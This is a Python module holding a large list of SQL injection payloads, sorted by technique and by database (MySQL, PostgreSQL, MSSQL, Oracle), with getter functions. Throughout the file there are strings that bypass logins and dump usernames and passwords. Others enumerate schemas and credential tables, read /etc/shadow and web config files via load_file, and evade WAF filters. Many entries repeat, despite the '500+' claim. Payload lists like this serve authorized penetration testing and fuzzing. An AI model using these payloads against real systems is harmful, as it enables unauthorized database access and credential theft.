# sql_payloads.py
# 500+ SQL Injection Payloads

SQLI_PAYLOADS = [
    # ============================================================
    # BASIC SQL INJECTION
    # ============================================================
    "' OR '1'='1",
    "' OR '1'='1'--",
    "' OR '1'='1'#",
    "' OR '1'='1'/*",
    "' OR '1'='1'%00",
    "' OR 1=1--",
    "' OR 1=1#",
    "' OR 1=1/*",
    "' OR 1=1%00",
    "' OR 'x'='x",
    "' OR 'x'='x'--",
    "' OR 'x'='x'#",
    "' OR 'x'='x'/*",
    '" OR "1"="1',
    '" OR "1"="1"--',
    '" OR "1"="1"#',
    '" OR 1=1--',
    '" OR 1=1#',
    ") OR ('1'='1",
    ") OR ('1'='1'--",
    ") OR (1=1--",
    ") OR (1=1#",
    "' OR 1=1-- -",
    "' OR 1=1#",
    "' OR 1=1/*",
    "' OR '1'='1'/*",
    "' OR '1'='1'#",
    "' OR '1'='1'--",
    "' OR '1'='1' AND '1'='1",
    "' OR '1'='1' AND '1'='2",
    "' OR '1'='1' OR '1'='1",
    "' OR '1'='1' OR '1'='2",
    "' OR 1=1 AND 1=1",
    "' OR 1=1 AND 1=2",
    "' OR 1=1 OR 1=1",
    "' OR 1=1 OR 1=2",
    
    # ============================================================
    # UNION BASED
    # ============================================================
    "' UNION SELECT NULL--",
    "' UNION SELECT NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",
    "' UNION SELECT 'admin'--",
    "' UNION SELECT 'admin','password'--",
    "' UNION SELECT username,password FROM users--",
    "' UNION SELECT table_name FROM information_schema.tables--",
    "' UNION SELECT column_name FROM information_schema.columns--",
    "' UNION SELECT schema_name FROM information_schema.schemata--",
    "' UNION SELECT version()--",
    "' UNION SELECT database()--",
    "' UNION SELECT user()--",
    "' UNION SELECT @@version--",
    "' UNION SELECT @@datadir--",
    "' UNION SELECT @@hostname--",
    "' UNION SELECT current_user()--",
    "' UNION SELECT system_user()--",
    "' UNION SELECT session_user()--",
    "' UNION SELECT @@basedir--",
    "' UNION SELECT @@tmpdir--",
    "' UNION SELECT @@log_error--",
    "' UNION SELECT @@pid_file--",
    "' UNION SELECT @@socket--",
    "' UNION SELECT @@sql_mode--",
    "' UNION SELECT @@time_zone--",
    "' UNION SELECT @@max_connections--",
    "' UNION SELECT @@max_allowed_packet--",
    "' UNION SELECT @@wait_timeout--",
    "' UNION SELECT @@interactive_timeout--",
    "' UNION SELECT @@net_buffer_length--",
    
    # ============================================================
    # ERROR BASED
    # ============================================================
    "' AND 1=CONVERT(int, @@version)--",
    "' AND 1=CONVERT(int, user())--",
    "' AND 1=CONVERT(int, database())--",
    "' AND 1=CONVERT(int, current_user())--",
    "' AND 1=CONVERT(int, system_user())--",
    "' AND 1=CONVERT(int, session_user())--",
    "' AND 1=CONVERT(int, version())--",
    "' AND 1=CONVERT(int, @@version)--",
    "' AND 1=CONVERT(int, @@datadir)--",
    "' AND 1=CONVERT(int, @@hostname)--",
    "' AND 1=CONVERT(int, @@basedir)--",
    "' AND 1=CONVERT(int, @@tmpdir)--",
    "' AND extractvalue(1,concat(0x7e,@@version))--",
    "' AND extractvalue(1,concat(0x7e,user()))--",
    "' AND extractvalue(1,concat(0x7e,database()))--",
    "' AND extractvalue(1,concat(0x7e,current_user()))--",
    "' AND extractvalue(1,concat(0x7e,@@version))--",
    "' AND updatexml(1,concat(0x7e,@@version),1)--",
    "' AND updatexml(1,concat(0x7e,user()),1)--",
    "' AND updatexml(1,concat(0x7e,database()),1)--",
    "' AND updatexml(1,concat(0x7e,current_user()),1)--",
    "' AND gtid_subset(concat(0x7e,@@version),1)--",
    "' AND gtid_subset(concat(0x7e,user()),1)--",
    "' AND gtid_subset(concat(0x7e,database()),1)--",
    "' AND 1=(SELECT 1 FROM (SELECT COUNT(*),concat(version(),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
    "' AND 1=(SELECT 1 FROM (SELECT COUNT(*),concat(user(),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
    "' AND 1=(SELECT 1 FROM (SELECT COUNT(*),concat(database(),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
    "' AND 1=(SELECT 1 FROM (SELECT COUNT(*),concat(column_name,floor(rand(0)*2))x FROM information_schema.columns GROUP BY x)a)--",
    
    # ============================================================
    # BLIND SQL INJECTION
    # ============================================================
    "' AND 1=1--",
    "' AND 1=0--",
    "' AND 1=1#",
    "' AND 1=0#",
    "' AND 1=1/*",
    "' AND 1=0/*",
    "' AND '1'='1",
    "' AND '1'='2",
    "' AND 'a'='a",
    "' AND 'a'='b",
    "' AND 1=1 AND 1=1",
    "' AND 1=1 AND 1=2",
    "' OR 1=1 AND 1=1",
    "' OR 1=1 AND 1=2",
    "' AND (SELECT 1)=1",
    "' AND (SELECT 1)=0",
    "' AND (SELECT COUNT(*) FROM users)>0",
    "' AND (SELECT COUNT(*) FROM users)=0",
    "' AND (SELECT COUNT(*) FROM information_schema.tables)>0",
    "' AND (SELECT COUNT(*) FROM information_schema.columns)>0",
    "' AND (SELECT COUNT(*) FROM mysql.user)>0",
    "' AND (SELECT COUNT(*) FROM sys.objects)>0",
    "' AND (SELECT COUNT(*) FROM master..sysobjects)>0",
    
    # ============================================================
    # TIME BASED
    # ============================================================
    "' AND SLEEP(5)--",
    "' AND SLEEP(10)--",
    "' AND SLEEP(15)--",
    "' AND SLEEP(20)--",
    "' AND SLEEP(5)#",
    "' AND SLEEP(10)#",
    "' AND SLEEP(15)#",
    "' OR SLEEP(5)--",
    "' OR SLEEP(10)--",
    "' OR SLEEP(15)--",
    "' AND SLEEP(5) AND '1'='1",
    "' AND SLEEP(10) AND '1'='1",
    "' AND SLEEP(15) AND '1'='1",
    "' AND (SELECT SLEEP(5))--",
    "' AND (SELECT SLEEP(10))--",
    "' AND (SELECT SLEEP(15))--",
    "' AND BENCHMARK(1000000,MD5('A'))--",
    "' AND BENCHMARK(5000000,MD5('A'))--",
    "' AND BENCHMARK(10000000,MD5('A'))--",
    "' AND BENCHMARK(50000000,MD5('A'))--",
    "' OR BENCHMARK(1000000,MD5('A'))--",
    "' OR BENCHMARK(5000000,MD5('A'))--",
    "' AND pg_sleep(5)--",
    "' AND pg_sleep(10)--",
    "' AND pg_sleep(15)--",
    "' AND (SELECT pg_sleep(5))--",
    "' AND (SELECT pg_sleep(10))--",
    "' AND (SELECT pg_sleep(15))--",
    "' WAITFOR DELAY '0:0:5'--",
    "' WAITFOR DELAY '0:0:10'--",
    "' WAITFOR DELAY '0:0:15'--",
    "' AND WAITFOR DELAY '0:0:5'--",
    "' AND WAITFOR DELAY '0:0:10'--",
    "' AND WAITFOR DELAY '0:0:15'--",
    
    # ============================================================
    # COMMENT BASED
    # ============================================================
    "' OR '1'='1'-- -",
    "' OR '1'='1'#",
    "' OR '1'='1'/*",
    "' OR '1'='1'/**/",
    "' OR 1=1-- -",
    "' OR 1=1#",
    "' OR 1=1/*",
    "' OR 1=1/**/",
    "' AND 1=1-- -",
    "' AND 1=1#",
    "' AND 1=1/*",
    "' AND 1=1/**/",
    "' UNION SELECT NULL-- -",
    "' UNION SELECT NULL#",
    "' UNION SELECT NULL/*",
    "' UNION SELECT NULL/**/",
    "'/**/OR/**/1=1--",
    "'/**/OR/**/1=1#",
    "'/**/OR/**/1=1/*",
    "'/**/AND/**/1=1--",
    "'/**/AND/**/1=1#",
    "'/**/AND/**/1=1/*",
    
    # ============================================================
    # LOGIC BASED
    # ============================================================
    "' OR 1=1 AND 1=1",
    "' OR 1=1 AND 1=2",
    "' OR 1=2 AND 1=1",
    "' OR 1=2 AND 1=2",
    "' OR 1=1 OR 1=1",
    "' OR 1=1 OR 1=2",
    "' OR 1=2 OR 1=1",
    "' OR 1=2 OR 1=2",
    "' AND 1=1 AND 1=1",
    "' AND 1=1 AND 1=2",
    "' AND 1=2 AND 1=1",
    "' AND 1=2 AND 1=2",
    "' OR (1=1)",
    "' OR (1=2)",
    "' OR (1=1 AND 1=1)",
    "' OR (1=1 AND 1=2)",
    "' OR (1=2 AND 1=1)",
    "' OR (1=2 AND 1=2)",
    "' OR 1 IN (SELECT 1)",
    "' OR 1 IN (SELECT 2)",
    "' OR 1 NOT IN (SELECT 1)",
    "' OR 1 NOT IN (SELECT 2)",
    "' OR EXISTS (SELECT 1)",
    "' OR EXISTS (SELECT 2)",
    "' OR NOT EXISTS (SELECT 1)",
    "' OR NOT EXISTS (SELECT 2)",
    
    # ============================================================
    # STRING BASED
    # ============================================================
    "' OR 'admin'='admin",
    "' OR 'admin'='admin'--",
    "' OR 'admin'='admin'#",
    "' OR 'admin'='admin'/*",
    "' OR 'user'='user",
    "' OR 'user'='user'--",
    "' OR 'password'='password",
    "' OR 'password'='password'--",
    "' OR 'username'='username",
    "' OR 'username'='username'--",
    "' OR 'test'='test",
    "' OR 'test'='test'--",
    "' OR 'root'='root",
    "' OR 'root'='root'--",
    "' OR 'abc'='abc",
    "' OR 'abc'='abc'--",
    "' OR '123'='123",
    "' OR '123'='123'--",
    "' OR 'true'='true",
    "' OR 'true'='true'--",
    
    # ============================================================
    # NUMBER BASED
    # ============================================================
    "' OR 1=1",
    "' OR 2=2",
    "' OR 3=3",
    "' OR 4=4",
    "' OR 5=5",
    "' OR 10=10",
    "' OR 100=100",
    "' OR 1000=1000",
    "' OR 9999=9999",
    "' OR 1<2",
    "' OR 2<3",
    "' OR 3<4",
    "' OR 4<5",
    "' OR 5<6",
    "' OR 1>0",
    "' OR 2>1",
    "' OR 3>2",
    "' OR 4>3",
    "' OR 5>4",
    "' OR 1<=1",
    "' OR 2<=2",
    "' OR 3<=3",
    "' OR 4<=4",
    "' OR 5<=5",
    "' OR 1>=1",
    "' OR 2>=2",
    "' OR 3>=3",
    "' OR 4>=4",
    "' OR 5>=5",
    "' OR 1<>2",
    "' OR 2<>3",
    "' OR 3<>4",
    "' OR 4<>5",
    "' OR 5<>6",
    
    # ============================================================
    # MYSQL SPECIFIC
    # ============================================================
    "' UNION SELECT @@version--",
    "' UNION SELECT @@datadir--",
    "' UNION SELECT @@hostname--",
    "' UNION SELECT @@basedir--",
    "' UNION SELECT @@tmpdir--",
    "' UNION SELECT @@log_error--",
    "' UNION SELECT @@pid_file--",
    "' UNION SELECT @@socket--",
    "' UNION SELECT @@sql_mode--",
    "' UNION SELECT @@time_zone--",
    "' UNION SELECT @@max_connections--",
    "' UNION SELECT @@max_allowed_packet--",
    "' UNION SELECT @@wait_timeout--",
    "' UNION SELECT @@interactive_timeout--",
    "' UNION SELECT @@net_buffer_length--",
    "' UNION SELECT version()--",
    "' UNION SELECT database()--",
    "' UNION SELECT user()--",
    "' UNION SELECT current_user()--",
    "' UNION SELECT system_user()--",
    "' UNION SELECT session_user()--",
    "' UNION SELECT schema_name FROM information_schema.schemata--",
    "' UNION SELECT table_name FROM information_schema.tables--",
    "' UNION SELECT column_name FROM information_schema.columns--",
    "' UNION SELECT table_schema FROM information_schema.tables--",
    "' UNION SELECT table_type FROM information_schema.tables--",
    "' UNION SELECT engine FROM information_schema.tables--",
    "' UNION SELECT table_rows FROM information_schema.tables--",
    "' UNION SELECT data_type FROM information_schema.columns--",
    "' UNION SELECT column_type FROM information_schema.columns--",
    "' UNION SELECT is_nullable FROM information_schema.columns--",
    "' UNION SELECT column_default FROM information_schema.columns--",
    "' UNION SELECT extra FROM information_schema.columns--",
    
    # ============================================================
    # POSTGRESQL SPECIFIC
    # ============================================================
    "' UNION SELECT version()--",
    "' UNION SELECT current_database()--",
    "' UNION SELECT current_user--",
    "' UNION SELECT session_user--",
    "' UNION SELECT current_schema()--",
    "' UNION SELECT schema_name FROM information_schema.schemata--",
    "' UNION SELECT table_name FROM information_schema.tables--",
    "' UNION SELECT column_name FROM information_schema.columns--",
    "' UNION SELECT table_schema FROM information_schema.tables--",
    "' UNION SELECT table_type FROM information_schema.tables--",
    "' UNION SELECT data_type FROM information_schema.columns--",
    "' UNION SELECT is_nullable FROM information_schema.columns--",
    "' UNION SELECT column_default FROM information_schema.columns--",
    "' UNION SELECT pg_sleep(5)--",
    "' UNION SELECT pg_sleep(10)--",
    "' UNION SELECT pg_sleep(15)--",
    
    # ============================================================
    # MSSQL SPECIFIC
    # ============================================================
    "' UNION SELECT @@version--",
    "' UNION SELECT @@servername--",
    "' UNION SELECT @@servicename--",
    "' UNION SELECT @@language--",
    "' UNION SELECT @@max_connections--",
    "' UNION SELECT @@max_precision--",
    "' UNION SELECT DB_NAME()--",
    "' UNION SELECT USER_NAME()--",
    "' UNION SELECT SUSER_NAME()--",
    "' UNION SELECT HOST_NAME()--",
    "' UNION SELECT SYSTEM_USER--",
    "' UNION SELECT SESSION_USER--",
    "' UNION SELECT CURRENT_USER--",
    "' UNION SELECT name FROM master..sysdatabases--",
    "' UNION SELECT name FROM sysobjects WHERE xtype='U'--",
    "' UNION SELECT name FROM syscolumns WHERE id=OBJECT_ID('users')--",
    "' UNION SELECT name FROM syscolumns WHERE id=OBJECT_ID('table')--",
    "' WAITFOR DELAY '0:0:5'--",
    "' WAITFOR DELAY '0:0:10'--",
    "' WAITFOR DELAY '0:0:15'--",
    
    # ============================================================
    # ORACLE SPECIFIC
    # ============================================================
    "' UNION SELECT banner FROM v$version--",
    "' UNION SELECT global_name FROM global_name--",
    "' UNION SELECT username FROM all_users--",
    "' UNION SELECT table_name FROM all_tables--",
    "' UNION SELECT column_name FROM all_tab_columns--",
    "' UNION SELECT owner FROM all_tables--",
    "' UNION SELECT tablespace_name FROM all_tablespaces--",
    "' UNION SELECT user FROM dual--",
    "' UNION SELECT sysdate FROM dual--",
    "' AND 1=CTXSYS.DRITHSX.SN(user,user)--",
    "' AND 1=CTXSYS.DRITHSX.SN(user,user)#",
    
    # ============================================================
    # ADVANCED BYPASS
    # ============================================================
    "' OR 1=1-- -",
    "' OR 1=1#",
    "' OR 1=1/*",
    "' OR 1=1/**/",
    "' OR 1=1%00",
    "' OR 1=1%0A",
    "' OR 1=1%0D",
    "' OR 1=1%0B",
    "' OR 1=1%0C",
    "' OR 1=1%09",
    "' OR 1=1%20",
    "' OR 1=1%2B",
    "' OR 1=1%2C",
    "' OR 1=1%3B",
    "' OR 1=1%3C",
    "' OR 1=1%3E",
    "' OR 1=1%3F",
    "' OR 1=1%40",
    "' OR 1=1%5B",
    "' OR 1=1%5D",
    "' OR 1=1%5E",
    "' OR 1=1%60",
    "' OR 1=1%7B",
    "' OR 1=1%7C",
    "' OR 1=1%7D",
    "' OR 1=1%7E",
    "' OR 1=1%80",
    "' OR 1=1%81",
    "' OR 1=1%82",
    "' OR 1=1%83",
    "' OR 1=1%84",
    "' OR 1=1%85",
    "' OR 1=1%86",
    "' OR 1=1%87",
    "' OR 1=1%88",
    "' OR 1=1%89",
    "' OR 1=1%8A",
    "' OR 1=1%8B",
    "' OR 1=1%8C",
    "' OR 1=1%8D",
    "' OR 1=1%8E",
    "' OR 1=1%8F",
    
    # ============================================================
    # CASE SENSITIVE BYPASS
    # ============================================================
    "' Or 1=1--",
    "' Or 1=1#",
    "' Or 1=1/*",
    "' oR 1=1--",
    "' oR 1=1#",
    "' oR 1=1/*",
    "' UNIOn SELECT NULL--",
    "' UNIOn SELECT NULL#",
    "' UNIOn SELECT NULL/*",
    "' Union Select NULL--",
    "' Union Select NULL#",
    "' Union Select NULL/*",
    "' uNiOn sElEcT NULL--",
    "' uNiOn sElEcT NULL#",
    "' uNiOn sElEcT NULL/*",
    
    # ============================================================
    # ENCODED PAYLOADS
    # ============================================================
    "'%20OR%20'1'='1",
    "'%20OR%201=1--",
    "'%20AND%201=1--",
    "'%20UNION%20SELECT%20NULL--",
    "'%20UNION%20SELECT%20NULL,NULL--",
    "'%20OR%20'x'='x",
    "'%20OR%201=1%23",
    "'%20AND%201=1%23",
    "'%20UNION%20SELECT%20NULL%23",
    "'%20OR%20'1'%3D'1",
    "'%20OR%201%3D1--",
    "'%20AND%201%3D1--",
    "'%20UNION%20SELECT%20NULL%3B--",
    "'%20OR%20'admin'%3D'admin",
    "'%20OR%20'admin'%3D'admin'--",
    
    # ============================================================
    # WAF BYPASS
    # ============================================================
    "'/*!OR*/1=1--",
    "'/*!OR*/1=1#",
    "'/*!AND*/1=1--",
    "'/*!AND*/1=1#",
    "'/*!UNION*/SELECT NULL--",
    "'/*!UNION*/SELECT NULL#",
    "'/**/OR/**/1=1--",
    "'/**/OR/**/1=1#",
    "'/**/AND/**/1=1--",
    "'/**/AND/**/1=1#",
    "'/**/UNION/**/SELECT NULL--",
    "'/**/UNION/**/SELECT NULL#",
    "'/*!50000UNION*/SELECT NULL--",
    "'/*!50000UNION*/SELECT NULL#",
    "'/*!50000AND*/1=1--",
    "'/*!50000AND*/1=1#",
    "'/*!50000OR*/1=1--",
    "'/*!50000OR*/1=1#",
    "' OR 1=1-- -",
    "' OR 1=1#",
    "' OR 1=1/*",
    "' OR 1=1/**/",
    "' OR 1=1%00",
    "' OR 1=1%0A",
    "' OR 1=1%0D",
    "' OR 1=1%0B",
    "' OR 1=1%0C",
    "' OR 1=1%09",
    "' OR 1=1%20",
    
    # ============================================================
    # INFORMATION SCHEMA PAYLOADS
    # ============================================================
    "' UNION SELECT table_name FROM information_schema.tables--",
    "' UNION SELECT column_name FROM information_schema.columns--",
    "' UNION SELECT schema_name FROM information_schema.schemata--",
    "' UNION SELECT table_schema FROM information_schema.tables--",
    "' UNION SELECT table_type FROM information_schema.tables--",
    "' UNION SELECT data_type FROM information_schema.columns--",
    "' UNION SELECT is_nullable FROM information_schema.columns--",
    "' UNION SELECT column_default FROM information_schema.columns--",
    "' UNION SELECT table_name FROM information_schema.tables WHERE table_schema='database'--",
    "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--",
    "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='admin'--",
    "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='passwords'--",
    "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='credentials'--",
    "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='logins'--",
    "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='accounts'--",
    "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='members'--",
    "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='profiles'--",
    
    # ============================================================
    # FILE SYSTEM PAYLOADS
    # ============================================================
    "' UNION SELECT load_file('/etc/passwd')--",
    "' UNION SELECT load_file('/etc/hosts')--",
    "' UNION SELECT load_file('/etc/shadow')--",
    "' UNION SELECT load_file('/etc/group')--",
    "' UNION SELECT load_file('/etc/fstab')--",
    "' UNION SELECT load_file('/etc/mysql/my.cnf')--",
    "' UNION SELECT load_file('/var/log/apache2/access.log')--",
    "' UNION SELECT load_file('/var/log/mysql/error.log')--",
    "' UNION SELECT load_file('/var/www/html/index.php')--",
    "' UNION SELECT load_file('/var/www/html/config.php')--",
    "' UNION SELECT load_file('C:/Windows/win.ini')--",
    "' UNION SELECT load_file('C:/boot.ini')--",
    "' UNION SELECT load_file('C:/Windows/System32/drivers/etc/hosts')--",
    "' UNION SELECT load_file('C:/xampp/htdocs/index.php')--",
    "' UNION SELECT load_file('C:/wamp/www/index.php')--",
    "' UNION SELECT load_file('C:/inetpub/wwwroot/index.php')--",
    "' UNION SELECT load_file('/proc/version')--",
    "' UNION SELECT load_file('/proc/cpuinfo')--",
    "' UNION SELECT load_file('/proc/meminfo')--",
    "' UNION SELECT load_file('/proc/uptime')--",
]

def get_sqli_payloads():
    return SQLI_PAYLOADS

def get_sqli_count():
    return len(SQLI_PAYLOADS)
